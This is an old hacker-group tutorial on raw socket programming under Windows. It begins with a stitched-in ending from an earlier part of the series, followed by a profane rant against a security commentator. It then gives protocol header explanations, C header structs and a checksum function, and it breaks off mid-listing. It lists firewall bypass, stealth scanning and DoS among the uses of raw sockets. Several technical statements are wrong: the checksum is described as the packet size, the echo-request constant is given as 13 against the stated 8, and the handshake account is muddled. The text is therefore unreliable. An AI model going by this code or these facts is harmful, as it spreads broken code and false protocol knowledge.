==============Well that’s it for this tutorial, or at least this part of it. More parts are planned so
hopefully you should see them on blacksun soon :). This part covered the basics of
windows programming, there was no point in writing about UNIX programming as bracaman
has released a very good tutorial on basic UNIX sockets programming which is available
from blacksun.box.sk and code.box.sk.I will be discussing Unix sockets again however in the next part of this tutorial but
mostly in a porting sense. To see what’s planned for future parts so far just look down :).
Part 2. - GENERAL SOCKETS - Porting to windows and cross platform code.
Part 3. - RAW Sockets - Have more control over packets with raw sockets.
Part 4. - ADVANCED - A real world example by building an internet communication suite.
Part 5. - FINISHING OFF - Putting it all together in one big program.So that’s what’s still to come, but I may change some of these future tutorials at any
time before there released if I do so it will be to improve the series in my view and
remember send me comments and suggestions and your ideas might also change the layout
of following tutorials.
Well thank you for reading this tutorial and visit my website to keep up to date with
the series and for add on code and articles to the series.- BR ;)
Id really like to thank Bracaman for everything including allowing me to use code from
his tutorial and please remember that this tutorial should be read with his (after his
1 even :P), so thanks for everything Bracaman it helped so much :).
All of the programs in this tutorial have been tested under Microsoft Visual C++ 6.0,
im running Windows 2000 Professional edition and I have an Intel Pentium 2.To set up the compiler for Winsock programming you need to link Wsock32.lib to your project.
Under Visual C++ do the following.1. Select the File view tab.
2. Right Click the files menu and go to Settings.
3. Select the Link tab in Project Settings.
4. Add Wsock32.lib to the list of .lib files and press ok.The winsock.h header file is included in windows.h so don’t worry about that.
Black Sun Research Facility Tutorials - Windows Internet Programming Part 3 _________________ /_ /\ \/ _______ / \ / / / / / / /______/ / / / __/ / / _______ \ __/ / / / / \ / /______/ / / _/ / / /______________/ / BLACK SUN RESEARCH FACILITY \ \ / http://blacksun.box.sk/ \______________\/ WINDOWS INTERNET PROGRAMMING PART 3 ================================================= WRITTEN BY [ cos125@hotmail.com :E-MAIL ] BINARY RAPE [ 114603188 :ICQ# ] [ http://blacksun.box.sk/ :TURORIALS ] Thanks to cyberwolf for letting me write this and BSRF for releasing it. Disclaimer ======================================= None of the information or code in this tutorial is meant to be used against others or to purposely damage computer systems or cause any loss of or damage to property. Further more neither myself or any other contributor to, or member of, the Blacksun research Facility (BSRF) can be held responsible for damage or loss of property of computer systems as a result of this tutorial. In this tutorial the code is provided as a learning aid so you can see how its done its not meant for you to use against yourself or others. Also you are encouraged to alter the code and improve it. I say create or build a program to do something not create or build a program to do something and use it for that purpose. CONTENTS ======================================= 1. Introduction 2. What are Raw Sockets? 3. The Internet Headers 3.1 The IP Header 3.2 The TCP Header 3.3 The UDP Header 3.4 The ICMP Header 4. Creating a Packet 4.1 Setsockopt() 4.2 Socket() 5. Building Headers in code. 5.1 The IP Header 5.2 The TCP Header 5.3 The UDP Header 5.4 The ICMP Header 5.5 The Psuedo Header 5.6 The Checksum Function 6. Source Code 6.1 ICMP Echo Request 6.2 TCP ACK Packet 7. Recieving Raw Sockets 8. Last Words ________________________________________________________________________________________________________ 1.0 INTRODUCTION ======================================= Welcome to the 3rd and quite possibly.. the last in this little series of ours, its been fun.. kinda.. but never fear there may be one last part to come in future covering advanced topics like multicasting and we'll always have updates on the tutorials. Of course ive saved the best topic for last, Raw Socket programming, and even more so its in Windows! A topic which in this place has a certain member of the computer security world huffing and yes indeed there is puffing also. Head on over to grc.com for more information and listen to him piss his pants scared because of raw sockets support in Windows XP... you see Steve Gibson of grc.com believes that because of windows xp's raw socket support is available to all users on a windows XP Home Edition computer he foresee's the following scenario: A few kids, it would only take a small group, maybe friends in school, they meet each day in a dark little ol' alley at the back of school and decide who there next "target" is going to be, they then all decide on a time to attack and as Gibson puts it "synchronises their watches", then at the decided time they fire up the DoS tools on their new copy of windows XP Home Edition and launch their attack upon whatever ill-faithed domain name that the kids had decided earlier. Hmmm.... interesting, well mostly Gibson you focus upon Home Edition of windows XP, why? well of course its because of its support for Raw Sockets for all users, yes but in your dark and devious example of "Junior and his XP gang" you refer to that upgrade the kids would get to windows XP home edition well what if they had a copy of Windows XP professional or Windows 2000, or even Windows NT for that matter of course these other operating systems dont have support for Raw Sockets to all its users but if its the kids that are installing these Os's wouldn't set up the admin account or give themselves admin priv's? then they would have raw socket support anyway. ok Gibson lets give ya a little break in fairness Raw Socket support on Home Edition may be dangerous and people are of course likely to exploit this feature (no Steven it is not a bug it is a feature) and create DDoS tools with it but lets look at things, will it really make things bad, will this put an end to the threat of DDoS attacks from Windows Systems? Well no actually huh! shock horror there is yet still raw socket support on systems other than windows xp, Win2k only supports raw sockets for admin users, what if some-1 gains admin privilages they could still use it hell with NT all you have to do is change an entry in the registry, ok lets pull out raw socket support for these 3 operating systems all together and we'll be safe right? Well unfortunately Win9x systems with Winsock v2.0 also have Raw Socket support limited as it is. Thankfully with Windows 9x you can only create ICMP packets... but am.. theres still a load of things i could do with just ICMP Steveo, I could get a subnetmask, ping and traceroute, firewalk, fact of the matter is I could even create a trojan with icmp tunneling! and this is all without even touching icmp based DoS attacks! Well the answer is simple then isn't it Steve all we have to do is pull raw socket support from Winsock v2.0, but yes Steve all we have to do is create a dll or use an already existing C++ library to create raw socket abilities in our applications, you do comment on this in your site saying how it doesn't matter because in the past we would have to install new drivers and things, wow, do you think that some-1 that really wanted to create a DoS attack would be stopped by the need to download 1 more little piece, the application could even install any drivers or dll's it needed on its own. Yes Steve Gibson, there could be raw socket support now on Windows XP computers.. but then again there always was raw socket support on all windows boxes if you really looked and yes there will be DDoS attacks to come, just like there always would have been even without its canned support in windows boxes, also you refered to linuxs support for raw sockets as if it didnt matter because of the size of its distribution, more and more people are using linux and realising its benefits and we are seeing the beginning of "The Linux Lamer" 2 words which sadly should never have been mentioned in the same sentence, these people could still use DDoS linux tools. What will Raw Sockets bring? DDoS tools? certainly, Better firewalls on Windows systems? Yes. The availability of security scanners and a wider understanding of the internet and its protocols to windows programmers? well yup and probably alot more, maybe you are just setting up so much hype for the very reason you gave Mr. Gibson sir, You didnt shout out when scripting support was added to mail clients, now you can cause such a large amount of confusion and fear in people and have alot of people shouting no at you that once the very first stupid little DoS tool that comes along for windows XP that you can say haha yes! I told you so, I was right, you were wrong, but you see the thing is we're not saying your wrong, infact, your right, there will be DDoS tools and we all know that but all your managing to do is cause fear and confusion altough who knows, maybe you just make it your jollies getting people to complain and send flames to secure@microsoft.com so that they remove raw socket support from windows and you can feel like your a big man getting the big bad microsoft empire to do what you want? even the security manager at microsoft says: ". . . 'are DDoS attacks going to happen?' Yes. They will happen; and they will happen on Windows XP. " He is not admitting the great 'flaw' in the Windows XP operating system he is being realistic, maybe you should try it it'll be a new experience for ya. Any-1 in the computer security field will happily admit, no system can be completely secure and things like what your talking about will happen, but they don't even need raw socket support to do so. Maybe ive been wrong about you all the time maybe you just want to shout so much about the damn thing and even pass out source code for such tools so that some-1 will come across read your files, get the stuff into their head and run along with a hand-full of your little code and propeganda and finally design a tool like this, the more publicity you give this the more likely such a scenario like this will happen, of course that could be your whole point to get whatever it is your after, or it could be that if some-1 does design a bad DoS tool microsoft will have to pull the raw support and again you can get your jollies from being correct, forgetting every-1 that did agree with you but still saw your utter stupidity. Just to let every-1 know incase they are a bit concerned about Gibson's evil Windows XP Raw Socket support, the source code he created using raw sockets to show how bad they are doesn't actually work, there was a problem in his bind() function, after realising this he stated, "it's not clear to me what it even means to 'bind' a raw socket" and of course around the same time hes really getting at microsoft for their stupidity and complete lack of security or as you like to phrase it " MICROSOFT SECURITY " " The Oxymoron that keeps on giving ". One of the best things youve said troughout all this was infact: "a good thing for Windows raw socket security!" What was that the time you realised you were wrong about microsofts security or the time you went out to lunch and SHUT YOUR FUCKING ASS FOR 5 MINUTES AND STOPPED WRECKING EVERY-1'S FUCKING HEAD YOU ASSHOLE. I am so lucky that unlike people at microsoft.com's security devision I don't have to listen to either you or the countless number of people that you have scared into doing your bidding by exagerating facts and twisting other people's words to give the wrong idea, my hat goes off to Greg at Microsoft, personally I couldn't have done the same as he has done, not only did he immediately help out Steve with his enquiries he even kept steve up to date step by step in reveiwing his concerns. Steve quickly returned Greg's hospitality and consideration by insulting the amount of work he has done on his behalf and its quality. This particular behaviour is probably to be expected i guess from some-1 who is so egotistical, some-1 that would pretty much say people who say its good because its a standard are morons because they are following the pack and that its a standard just because some-1 said it is, no Steve its a standard because its a part of the standard specification for sockets, thats why its supported, 'as standard' if you will by all operating systems except from microsoft up to this point. Apparently trough it all Gibson just wants a time machine to travel a few years back where people still believed like he does that the best security is obscurity. One last point on this subject, The Firewall that comes with versions of windows XP, once again 'As Standard' blocks the types of attacks that Steve Gibson is describing, you think thats also a good thing for microsofts security Steve? So why all the fuss and anger in the last few paragraphs? Taught id never shut up didnt ya :P. Well as ive been researching Windows XP's raw socket abilities ive been effectively blocked by the constant reoccuring pages found concerning Gibsons bullshit and fear spreading tactics, after using a total of 8 different combinations of keywords and reading many many pages i finally found a grand total of 4 examples of windows raw socket programs, btw only one of them had ever been run on windows XP and im not even sure about that I think his code may actually have been run on windows 2000. One of them had only been run on a Windows 9x system !! Basically there isn't that much documentation to learn from out there in the void so I think it could do with me adding a little more, besides few guys flamed me a while back on 1 of the channels on box.sk's irc server, (not in #bsrf or #code), for saying that there was raw socket support in windows so I kinda wrote this for them as well, here ya go guys ;). So anyway without further delay lets get onto some real substance in this tutorial with the most common question of all. 2.0 WHAT ARE RAW SOCKETS? ======================================= Raw sockets are very similiar to normal sockets but with raw sockets you can control the packets that you send better and can control them. Raw sockets don't have anything to do with packets themselves they are purely a programming concept. You see with normal socket programming we would supply a certain amount of information like the ip address we were sending it to, the port, the buffer containg the text we were sending, and whatever protocol we would be sending it with like TCP or UDP, we would supply all this information by filling up structures and send the information by calling a couple of functions. The difference with Raw sockets is that we create our own structures for the headers and tell the Winsock that we wanted to use that information, now we would fill out these structures with a bit more information like our source IP address and fields like the Time To Live (TTL) that we discussed in the first part of this tutorial. using this method we can do many things with the Packets that we use like the following: * Get the Subnetmask from a computer. * Bypass firewalls and routers using various methods. * Map networks. * Send information covertly. * Exploit Network Stack vulnerabilities. * Perform a stealth port scan. * Remote OS identification. * Build a firewall. And theres way more that you could do as well. Until the release of Winsock 2.0 Raw Sockets could not be possible unfortunately, Winsock 1.1 never included the ability which was specified in the Berkeley Sockets specification (mostly because microsoft was in a rush to release the winsock stack). Luckily even if you dont have Winsock v2 (which more than likely you will) you can still download version 2.0 for your version of windows from the microsoft website, windows 3.1 unfortunately does not have a 2.0 version microsoft has decided not to release a 16 bit one. Of course if you have Windows 3.1 what the fuck are you doing? suddenly springs to mind, oh well, go away. Now Windows32 systems have Winsock however different versions have varying amounts of support for raw sockets. All Version 2 stacks have support for creating ICMP packets using Raw Sockets but Only Windows NT4, 2000 and XP have the capability for creating TCP and UDP packets. D'ont worry there is still alot of things you can do with ICMP alone if you use a Win 9x system. Before we go into the programming side of things we must now cover the IP, ICMP, TCP and UDP protocols in more detail. If you have read Part 1 of this tutorial you should have a pretty good idea about how all the protocols work if not thats ok it shouldn't be too bad and you should be able to understand things, so please read on for explenations of the Protocols. 3.0 THE INTERNET HEADERS ======================================= In part 1 we discussed the different Internet protocols and how they fit together with packets so you should know pretty well how data is transfered across the internet and understand many of the fields within the different headers, if you aren't sure or cant quite remember I suggest you read the first few sections of Part 1 of this tutorial. Well now that you have a pretty good idea about the different headers and understand the idea behind them we are going to have to go into slightly more detail about the different headers and their respective fields. 3.1 THE IP HEADER ======================================= +---------------------------------+--------------------------------+ |Version | IHL | TOS | Total Length | | 4 bits | 4 bits | 8 bits | 16 bits | +--------+--------+---------------+------+-------------------------+ | Identification |Flags | Fragment Offset | | 16 bits |3 bits| 13 bits | +-----------------+---------------+------+-------------------------+ | Time to Live | Protocol | Header Checksum | | 8 bits | 8 bits | 16 bits | +-----------------+---------------+--------------------------------+ | Source Address | | 32 bits | +------------------------------------------------------------------+ | Destination Address | | 32 bits | +------------------------------------------------+-----------------+ | Options | Padding | +------------------------------------------------+-----------------+ FIG 1.0 - Structure of an IP Header As you can see above the IP header has a total of 14 Fields. 1. Version 2. IHL 3. TOS 4. Total Length 5. Identification 6. Flags 7. Fragment Offset 8. Time To Live 9. Protocol 10. Header Checksum 11. Source Address 12. Destination Address 13. Options 14. Padding 1. Version - The version field describes what version of the IP Protocol is being used, we will be using IPv4 because it is more supported and IPv6 is not yet fully implemented. 2. IHL - The Internet Header Length (IHL) contains the length of the Internet Header in 32 bit words. Minimum value for a header is 5. 3. TOS - The Type Of Servive (TOS) field was designed to tell routers how the packet is to be handled for example so that packets that need to move quickly like streaming audio would have a higher TOS value than other packets so that routers would send them across the network faster. These days most routers do not process the TOS field because it would waste too much of the routers time so we usually just set the TOS field to 0. 4. Total Length - This field contains the total size of the Internet Packet including headers and data. Typical IP headers are 20 bytes in size, same with TCP ones, so an Internet Packet with an IP Header, a TCP Header and no data would be 20 + 20 = 40 bytes in length, Total Length = 40 Bytes. 5. Identification - This field is used to aid in tracking fragmented packets, each fragment has the same ID as the first datagram, the ID's of datagrams following each other is usually incremented, because this value must be unique most applications use there process id to fill in this field. 6. Flags - Flags are used with IP to control fragmentation, there are 4 flags. 1-NO FLAGS [VALUE = 0x00] Does not specify any fragmentation options 2-MORE FRAGMENT [VALUE - 0X01] Means there is more fragments to be recieved after this packet 3-DONT FRAGMENT [VALUE = 0X02] Tells the stack not to fragment this packet 4-MORE & DONT [VALUE = 0X03] Tells the stack that there are more packets to be recieved after this one and not to fragment it NOTE: THE LAST FRAGMENT CANNOT HAVE A FLAG OF 0X01 (MORE FRAG) AS THERE ARE NO OTHER PACKETS TO FOLLOW. 7. Fragment Offset - The fragment offset is used for placing different packets in the correct order when reassembling Datagrams. The first fragment must have a value of 0 and the last must be equal to the value of Total Length. Value is measured in units of 64 bits (8 octets). 8. Time To Live - The Time To Live (TTL) field was created so that if a packet cannot find its destination it will be destroyed rather than travel across the internet indefinately, if packets kept mounting in this fashion it would seriously degrade network performance. Each router that a packet meets decrements the value of the TTL field by one. If the value is decremented to 0 before it reaches its destination the packet will be destroyed and an error sent back to the computer that the packet originated from. If the TTL is set to 0 on creation it will immediately be destroyed. 9. Protocol - This field specifies what protocol is being carried in the datagram eg; TCP. The most common values are as follows: IPPROTO_TCP = TCP IPPROTO_UDP = UDP IPPROTO_ICMP = ICMP Other protocols and there values will be specified later. 10. Header Checksum - The checksum is the size of the Internet Header, it is used to verify the integrity of a packet by comparing the headers size with the value of the checksum. Certain fields in the IP Header change troughout transport such as the TTL field because of this the checksum is recalculated and verified by each router or gateway it encounters. 11. Source Address - The IP Address of the computer that the packet originated from. In other words if you sent a packet this field would contain your IP Address. This lets the computer being sent the packet know where it came from and where to send a reply. 12. Destination Address - The IP Address of the computer that the packet is being sent. Lets routers that the packet meets know where to send the packet to. 13. Options - Mostly the options aren't filled out and they are very rarely used at all so we wont discuss them very much. There are however 3 interesting options that we will discuss here, they are: 1. Loose Source Routing 2. Strict Source Routing 3. Record Routing. 1. Loose Routing Loose Routing allows us to specify the source computer (us) and the destination computer's IP Address's in the IP header along with the address's of a couple of other routers that the packet must travel across between, then we can better control how the packet travels across the internet. 2. Strict Routing Strict Routing allows us to specify the source computer (us) and the destination computer's IP Address's in the IP header along with the address's of other routers, the packet then has to travel along this exact route to get to its destination, using this we can route our packets around routers or gateways that are down or not responding, this also means that if you wanted to you could ensure that the packet travels across certain networks and passes certain routers, of course this isn't recommended as you could 'accidentaly' bypass security restrictions on some networks by using this method, which is naughty. 3. Record Routing Im sure we are all familiar with the traceroute program which uses the ICMP protocol to tell us what routers our packets are traveling trough to get to there destination, record routing can be used ina similiar way, by setting this option every router that the packet meets places its IP Address into the IP Header, we can then examine the packet and see what IP Address's it contains. NOTE: AN IP HEADER CAN ONLY BE A MAXIMUM OF 60 BYTES LONG AND THE HEADER IS 20 BYTES IN LENGTH, EACH IP ADDRESS IS 4 BYTES IN SIZE SO AN IP HEADER CAN ONLY CONTAIN A MAXIMUM OF 10 IP ADDRESS'S EACH. 14. Padding - Padding is there to respect the 32 bits boundary, its composed of 0's. 3.2 THE TCP HEADER ======================================= Well before we get into the TCP header we first have to explain how exactly a TCP connection is formed between two hosts. The First host sends a TCP packet with one of the fields in the header set with a value of SYN, this is known as a SYN (synchronise) packet. So what is this packet synchronising? A potential problem with a TCP connection would be if a connection was established between some internet user at home and a shop on the internet, the user views his details but in the mean time some-1 were to pretend they were that user and the webshop sent that users details to that person instead of the real user (such as the real users credit card numbers?). Because of this a thing called an acknowledgement number was created, the number is defined by the server and the syn packet is used to transmit this number to the host, both sides of the connection now have the same Acknowledgement number and they are synchronised! The Acknowledgement number will be contained in all TCP packets troughout this session and if any packets recieved at either side have a wrong Acknowledgement number then the packet will be discarded. The second host will now send another TCP packet this time with a field set to ACK (Acknowledge) this is known as a SYN_ACK packet. Its purpose is to acknowledge the reception of the SYN packet. Once the first host has recieved the SYN_ACK packet it sends one last ACK packet, just to be sure to be sure. As you can see this process involves 3 steps. 1. Host sends SYN packet to target start a connection 2. Target sends host an ACK packet saying it recieved the SYN. 3. Host sends target an ACK packet to confirm and connection is established. Because of these 3 steps the TCP connection is known as the Three-Way-Handshake. +---------------------------------+--------------------------------+ | Source Port | Destination Port | | 16 bits | 16 bits | +---------------------------------+--------------------------------+ | Sequence Number | | 32 bits | +------------------------------------------------------------------+ | Acknowledgment Number | | 32 bits | +--------+------------+-----------+--------------------------------+ |D-Offset| Reserved | Ctrl Bits | Window | | 4 bits | 6 bits | 6 bits | 16 bits | +--------+------------+-----------+--------------------------------+ | Checksum | Urgent Pointer | | 16 bits | 16 bits | +---------------------------------+--------------+-----------------+ | Options | Padding | +------------------------------------------------+-----------------+ | Data | +------------------------------------------------------------------+ FIG 1.1 - Structure of a TCP Header There are 12 fields in total in the TCP Header and your Datagram. 1. Source Port 2. Destination Port 3. Sequence Number 4. Acknowledgement Number 5. Data Offset 6. Reserved 7. Control Bits 8. Window 9. Checksum 10. Urgent Pointer 11. Options 12. Padding 1. Source Port - The Source port number. 2. Destination Port - The Destination port number. 3. Sequence No. - The sequence number is used to ensure that segments recieved by a host are from where they claim to be, this prevents people from hijacking connections. 4. Acknowledgement No. - The acknowledgement number to ensure both sides of the connection are authentic, as explained above. 5. Data Offset - The Data Offset in the header is expressed in 32 bit words. The default is 5 if you have no options set in the TCP header. 6. Reserved - This field is reserved for future use, you must have it set to 0. 7. Control Bits - This is the field that contains values such as SYN and ACK. It has a total of 6 values. URG: Send Urgent Data to destination. ACK: Acknowledgment of Data. PSH: Push Data to destination. RST: Reset the connection. SYN: Synchronize sequence numbers. FIN: No more data from sender. 8. Window - Specifies the maximum size of a segment that you can accept, if the segment is larger than this then it must be fragmented. 9. Checksum - The TCP checksum just like we explained with the IP header, is to ensure that there is no loss of Data during transport, it gets the size of the packet and when it gets to the host the host compares the size of the packet with the value of the checksum and if they dont match you can see the packet was mangled during transport. The TCP Checksum is calculated using a psuedo header which is prefixed to the TCP Header. The purpose of this Psuedo Header is to protect the TCP packet from misrouted segments. The Psuedo Header contains 4 main pieces of information, the Source IP, the Destination IP numbers, the protocol and the TCP length. +-----------------------------------+ | Source Address | +-----------------------------------+ | Destination Address | +--------+--------+--------+--------+ | zero | PTCL | TCP Length | +--------+--------+--------+--------+ FIG 1.3 - The structure of a Psuedo Header The TCP Length field is the length of the TCP Header + length of the Data and does not count the length of the Psuedo Header (12 Bytes). 10. Urgent Pointer - This field is only to be set when the URG control bit is set. It points to a Data area. 11. Options - The TCP options field is very similiar to the IP Options field except it has fewer interesting parts that need to be mentioned here... none. 12. Padding - The same as the IP Padding Field. 3.3 THE UDP HEADER ======================================= +---------------------------------+--------------------------------+ | Source Port | Destination Port | | 16 bits | 16 bits | +---------------------------------+--------------------------------+ | Length | Checksum | | 16 bits | 16 bits | +---------------------------------+--------------------------------+ FIG 1.4 - The Structure of a UDP Header The UDP Header is more basic than previous Headers, it has only 4 fields. 1. Source Port 2. Destination Port 3. Length 4. Checksum 1. Source Port - Same as in TCP. 2. Destination Port - Same as in TCP. 3. Length - The length of the Datagram, including UDP Header and Data. Size must be at least 8. 4. Checksum - Same as TCP this field protects against misrouted packets it also uses the same Psuedo Header as TCP. 3.4 THE ICMP HEADER ======================================= +----------------+----------------+--------------------------------+ | Type | Code | Checksum | | 8 bits | 8 bits | 16 bits | +----------------+----------------+--------------------------------+ | Unused | | 32 bits | +------------------------------------------------------------------+ | Internet Header + 64 bits of Original Data | | 32 bits | +------------------------------------------------------------------+ FIG 1.5 - The Standard Structure of an ICMP Header The ICMP Header changes depending on the message it is sending. Different ICMP Messages are conveyed by combinations of different values and the Unused Field can contain different values and become used depending upon the different ICMP messages being sent. For example in some messages you may need to specify the general Type of message and then its code, this certain message may require additional information such as the IP Address of a computer, this address would then be stored in the Unused Field. The ICMP protocol is similiar to UDP in that it is used in messages of 1 Datagram in size, however, ICMP is more like an extension of IP and certain fields must also be set for use with ICMP. The Standard ICMP Header has 4 main fields. 1. Type 2. Code 3. Checksum 4. Unused 1. Type - Field declaring the type of ICMP Message. 2. Code - Field specifying the messages code to identify its meaning. 3. Checksum - Calculated the same as other headers, the kernel may pad this if the checksum is an odd number to respect 32 bit boundaries in most ICMP messages but Checksum is not calculated in some ICMP Messages. 4. Unused - The value of this field varies depending on the type of ICMP message, if no value is to be entered in this field it must be specified as 0. There are several different ICMP messages but here we are only going to refer to the 2 most interesting types Echo and Netmask request and reply's. ====================== Echo Request and Reply ====================== Description: These two ICMP Messages are commonly used in conjunction to form the ping program. First we send an Echo Request to a host and that host then sends us an echo reply. By sending multiple requests to a host and comparing the time they were sent with the time that the Echo Reply was recieved we can calculate the mean time that packets are sent between us and that host. This Message is also useful to determine whether a host is reachable and connected to the internet or not. Data can be inserted into an Echo request, perhaps for checking the integrity of a packet which it is returned? Type: Echo Request = 8 Echo Reply = 0 Code: Field Unused = 0 Checksum: As specified above. Identifier: Same as the IP Identifier, useful to determine which ICMP Echo Reply belongs to which Echo Request. Sequence Number: Used in the same way as the Identifier is above, useful for matching Echo Reply's with Requests. ==================================================================== ========================= Netmask Request and Reply ========================= Description: We can send a netmask request to a host and it will return a netmask reply containing its subnetmask, getting subnetmasks is useful for mapping out and gathering information on network topology. Type: Netmask Request = 17 Netmask Reply = 18 Code: Field Unused = 0 Checksum: Same as above. Identifier: Same as the IP Identifier, useful to determine which ICMP Netmask Reply belongs to which Netmask Request. Sequence Number: Used in the same way as the Identifier is above, useful for matching Netmask Reply's with Requests. ==================================================================== 4.0 CREATING A PACKET ======================================= OK well thats enough Protocol Header theory, lets look at how we are going to construct a raw socket in code and the differences between coding raw sockets and normal windows sockets code. Now with normal Sockets we give certain information to the stack in the case of windows, the Winsock. This information comprises of things like what transport layer were gonna use, TCP or UDP, the address of the host we are going to send it to, the port for it to go to, the Data to be contained within the Datagram, we name the socket call the sendto() function and off it goes. What we should consider now is what then happens to the information that we just provided, we know how the IP protocol sends it off zooming across the internet and how the host handles and sends this Data, but what happens inbetween the time we called sendto() and the time that packet leaves our computer? Well we passed this information to the winsock, the winsock then takes information such as the Destination address and our own address along with the protocol we specified and fills out the relevant fields in the protocol header, it then sets the TTL with its own default value of 35. Then the winsock uses the other information we provided, the source and destination port numbers, and fills the relevant TCP or UDP Header fields, and constructs the header, wraps the headers around the Data we specified and calculates things such as fragmentation and fills in the fields. Once everything is filled out and wrapped up the winsock calculates the size of the packet and specifies the checksum value. With all this done the winsock sends the packet off to whiz around the internet. So with normal sockets we dont have to specify all those nasty fields in the Headers we leave it up to good ol' winsock and it handles that but we want to create our own headers so how do we stop the winsock from prefixing its headers onto our packet? 4.1 SETSOCKOPT() ======================================= The setsockopt() function is very important in raw sockets, its here that we tell the winsock that we want to use our own headers for this packet and for it to not add its own to ours. The setsockopt() function has 5 parameters: 1. Socket 2. Level 3. Option Name 4. Option value 5. Option Length 1. Socket - Just like in normal sockets this is a Socket that we made earlier in the program. 2. Level - This is the protocol we are going to be using in the program, it has values such as IPPROTO_TCP and IPPROTO_IP. 3. Option Name - The socket option we are going to set, we will be setting this to IP_HDRINCL, this option is what tells the winsock we want to include our own headers for the packet. 4. Option Value - Pointer to the buffer in which the value for the requested option is supplied. We will be using a boolean called bOpt set to true for this, set to false would mean that we dont want to use the IP_HDRINCL option. 5. Option Length - The size of the buffer which supplies the value. We will use sizeof(bOpt) for this. The setsockopt() function well be looking at so will look like this: setsockopt(myraw, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt) So now how do we tell the winsock that we want to use raw sockets instead of normal sockets in the first place? 4.2 SOCKET() ======================================= Of course weve already covered the socket() function in the past and are familiar with its different parameters but what we have to be concerned about two of its parameters, its type and protocol. A normal socket looks like the following: socket(AF_INET, SOCK_STREAM, 0) Before we used to set its type as SOCK_STREAM or SOCK_DGRAM for TCP and UDP respectively. In raw sockets however we will set the type parameter to SOCK_RAW and the protocol to IPPROTO_RAW. A Raw Socket looks like this: socket(AF_INET, SOCK_RAW, IPPROTO_RAW); So thats how we tell the winsock that its a raw socket that we will be using which still leaves the question how do we build the actual header? 5.0 BUILDING HEADERS IN CODE ======================================= The Headers are built using normal C structures, we declare a struct for each header we want to build and declare a variable for each field of the Header that we will be using. While creating the structure we must remember that there are certain expectations and limitations on the size of Headers, an IP Header is 20 Bytes in size, so we will have to use certain types of variables to reflect the sizes of these fields the different variable types and there sizes are as follows: unsigned char = 1 byte (8 bits) unsigned short int = 2 bytes (16 bits) unsigned int = 4 bytes (32 bits) 5.1 THE IP HEADER ======================================= The IP Header as explained above will be built using a structure containing all of the fields in the IP Header. As you will remember there are 14 fields in the IP Header, however we will not be using any of the IP's Options or the padding, also in our examples we will only be using single Datagrams so there will be no need for fragmenting the packets so we will not be using the flags field and we will just set the Fragment Offset to 0. So with a total of 14 fields in the IP Header we will not be using 3 of them so that leaves us with 11 fields, also we will be storing the Ip version and length in one variable so that means we will be using a total of 10 variables for our code when building the Header. Well here is the structure we will be using to build the IP Header: typedef struct ip_hdr { unsigned char ip_verlen; // version & IHL => 1 Bytes (combined size of both) unsigned char ip_tos; // TOS => 1 Bytes unsigned short ip_totallength; // Total length => 2 Bytes unsigned short ip_id; // Identification => 2 Bytes unsigned short ip_offset; // Fragment Offset => 2 Bytes unsigned char ip_ttl; // Time to live => 1 Bytes unsigned char ip_protocol; // Protocol => 1 Bytes unsigned short ip_checksum; // Header checksum => 2 Bytes unsigned int ip_srcaddr; // Source address => 4 Bytes unsigned int ip_destaddr; // Destination address => + 4 Bytes // = 20 Bytes }IP_HDR; This structure contains all of the fields we will be using and the sizes of the variables add up to 20 Bytes, the correct size of an IP Header, note however that the Fragment Offset field is given a value of 2 Bytes which is equal to 16 bits, the true size of the frag offset is 13 but we altered it here to make up for the missing 3 bits of the flag field but it wont make any difference to the packet this is still a perfectly formed IP Header. 5.2 THE TCP HEADER ======================================= With the below structure you will again notice that there are a few of the TCP Headers fields missing, again Options and Padding are not included as we will not be using them, that leaves us with a total of 10 fields and the reserved field has been left out because it is not currently implemented by TCP so we are left with 9 fields to fill. With the missing fields of the Header we have increased the sizes of the Control Bits and Data Offset fields both to 1 Byte to make up the 20 Byte size of the TCP Header. So here is the TCP Structure: typedef struct tcp_hdr { unsigned short sport; // Source Port => 2 Bytes unsigned short dport; // Destination Port => 2 Bytes unsigned int seqnum; // Sequence Number => 4 Bytes unsigned int acknum; // Acknowledgement Number => 4 Bytes unsigned char DataOffset; // Data Offset => 1 Bytes unsigned char Flags; // Control Bits => 1 Bytes unsigned short Windows; // Window => 2 Bytes unsigned short Checksum; // Checksum => 2 Bytes unsigned short UrgPointer; // Urgent Pointer => + 2 Bytes // = 20 Bytes }TCP_HDR; 5.3 THE UDP HEADER ======================================= The below structure is the UDP Header, unlike previous headers it is not missing any fields and adds up to a totalsize of 8 Bytes. typedef struct udp_hdr { unsigned short sport; // Source Port => 2 Bytes unsigned short dport; // Destination Port => 2 Bytes unsigned short Length; // Length => 2 Bytes unsigned short Checksum; // Checksum => + 2 Bytes // = 8 Bytes }UDP_HDR; 5.4 THE ICMP HEADER ======================================= The ICMP Header is similiar to the UDP Header, it has very few fields and it adds up to a size of 8 Bytes. typedef struct tagICMPHDR { unsigned char icmp_type; // Type of message => 1 Bytes unsigned char icmp_code; // Type sub code => 1 Bytes unsigned short icmp_cksum; // Checksum => 2 Bytes unsigned short icmp_id; // Identifer => 2 Bytes unsigned short icmp_seq; // sequence number => + 2 Bytes // = 8 Bytes } ICMPHDR, *PICMPHDR; 5.5 THE PSUEDO HEADER ======================================= The Psuedo Header is used to protect against misrouted segments, its size is 12 Bytes, the following structure forms the Psuedo Header: typedef struct ps_hdr { unsigned int source_address; // Source Address => 4 Bytes unsigned int dest_address; // Destination Address => 4 Bytes unsigned char placeholder; // Place Holder => 1 Bytes unsigned char protocol; // Protocol => 1 Bytes unsigned short tcp_length; // TCP Length => + 2 Bytes // = 12 Bytes struct tcp_hdr tcp; }PS_HDR; 5.6 THE CHECKSUM FUNCTION ======================================= The Checksum Function is needed to calculate the size of the packet, here is the functions code: USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(USHORT); } if (size) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } 6.0 SOURCE CODE ======================================= Well in the Source Code we are first going to look at code which is supported by all Winsock 2 Systems including Win 9x ones so that every-1 can av' a go as it were. So in this section we are going to put what weve learned so far together and create a working internet application by using the icmp protocol to send an ICMP Echo Request message, the first part of a ping program. First tough we are going to create a header ".h" file for the application, the file contains the checksum function and structures for the IP and ICMP headers. Remember you will have to make sure that the header file is included correctly with the source file and that you linked to Ws2_32.lib. 6.1 ICMP ECHO REQUEST ======================================= /********************* icmp.h header file ************************/ // ICMP message types #define ICMP_ECHOREQ 13 // Echo request query // IP Header typedef struct ip_hdr { unsigned char 